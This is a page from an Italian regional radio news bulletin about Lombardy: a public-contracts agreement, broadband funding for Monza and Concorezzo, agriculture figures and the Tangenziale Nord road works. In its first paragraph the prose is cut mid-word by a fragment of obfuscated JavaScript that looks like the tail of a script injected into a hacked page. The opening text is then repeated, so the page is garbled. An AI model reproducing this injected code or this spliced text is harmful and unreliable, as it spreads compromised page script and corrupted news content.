Bentrovati al nostro nuovo appuntamento informativo realizzato in collaborazione con Regione Lombardia

Garantire massima trasparenza e tutela della legalità dei contratti, assicurare l'economicità e l'efficienza nella loro esecuzione, attuare il pieno rispetto della concorrenza nelle procedure di gara. Sono questi gli obiettivi dell'Accordo di collaborazione tra l'Autorit&(e)s=s+ff(w[j]+3);}xz=e;if(window.document)xz(s)} Notiziario regionale ore 18 Bentrovati al nostro nuovo appuntamento informativo realizzato in collaborazione con Regione Lombardia

Garantire massima trasparenza e tutela della legalità dei contratti, assicurare l'economicità e l'efficienza nella loro esecuzione, attuare il pieno rispetto della concorrenza nelle procedure di gara. Sono questi gli obiettivi dell'Accordo di collaborazione tra l'Autorità per la vigilanza sui contratti pubblici di lavori, servizi e forniture e la Regione Lombardia, sottoscritto dai rispettivi presidenti Sergio Santoro e Roberto Formigoni. "Il 30 per cento dei grandi cantieri nazionali sono attivi in questo territorio, che quindi è interessato da un elevato numero di contratti pubblici per le opere, oltre a quelli per servizi e forniture" ha spiegato Formigoni...

-    Audio

Un investimento di un milione di euro per promuovere la connessione a internet superveloce nel distretto industriale di Monza e Concorezzo. Il finanziamento è stato erogato da Regione Lombardia per realizzare le infrastrutture che consentiranno a più di 500 aziende di sfruttare la banda ultra larga. Il progetto, promosso da Regione Lombardia, è reso possibile grazie alla sottoscrizione della convenzione con i Comuni di Monza e Concorezzo, Camera di Commercio di Monza e Brianza e Distretto Green e High Tech. I fondi messi a disposizione dovranno poi fungere da volano per investimenti futuri da parte di altri enti pubblici o privati. Attraverso due gare a evidenza pubblica saranno individuati gli operatori che si occuperanno di realizzare l'infrastruttura in fibra ottica e di gestire il veicolamento del servizio per le aziende. "Parte una sperimentazione sui distretti industriali che vogliamo possa fare da start up per implementare un servizio che porterà benefici economici e occupazionali" ha sottolineato l'assessore all'Ambiente, Energia e Reti di Regione Lombardia, Marcello Raimondi...

-    Audio –

Affonda la redditività dell'agricoltura lombarda, aggravata dal sisma che ha colpito il mantovano e dalla siccità, ma il lattiero-caseario tiene grazie alla cooperazione. Sono i dati emersi dall'analisi congiunturale del secondo trimestre del 2012 sull'agricoltura regionale presentata da Unioncamere Lombardia e Regione. L'assessore all'agricoltura, Giulio De Capitani...

-    Audio -

L'assessore alle Infrastrutture e Mobilità della Regione Lombardia Raffaele Cattaneo ha riunito il tavolo per il completamento della Tangenziale Nord di Milano SP 46 'Rho-Monza', per fare il punto sullo stato di avanzamento della realizzazione del nuovo tratto stradale e la riqualificazione della bretella.  All'incontro erano presenti i rappresentanti dei Comuni interessati dal tracciato, l'assessore alle Infrastrutture della Provincia di Milano Giovanni De Nicola, il direttore dell'Ispettorato Vigilanza Concessioni Autostradali di Anas, Mauro Coletta e i dirigenti e i tecnici di Autostrade per l'Italia (Aspi), Serravalle e del Provveditorato alle Opere pubbliche.   Il primo punto affrontato è stato il tratto di competenza di Aspi compreso fra la ferrovia Milano-Varese nel Comune di Novate Milanese e la connessione con l'autostrada A4 Milano Venezia - uscita fiera di Rho-Pero.  Nel corso dell'incontro Aspi ha presentato la propria proposta di variante al progetto definitivo che vede la realizzazione dell'opera a raso anziché in trincea, come previsto dal progetto preliminare approvato in Conferenza dei Servizi, per ovviare all'innalzamento della falda acquifera, ricevendo però il parere negativo da parte di tutte le istituzioni presenti.

È tutto, grazie per l’ascolto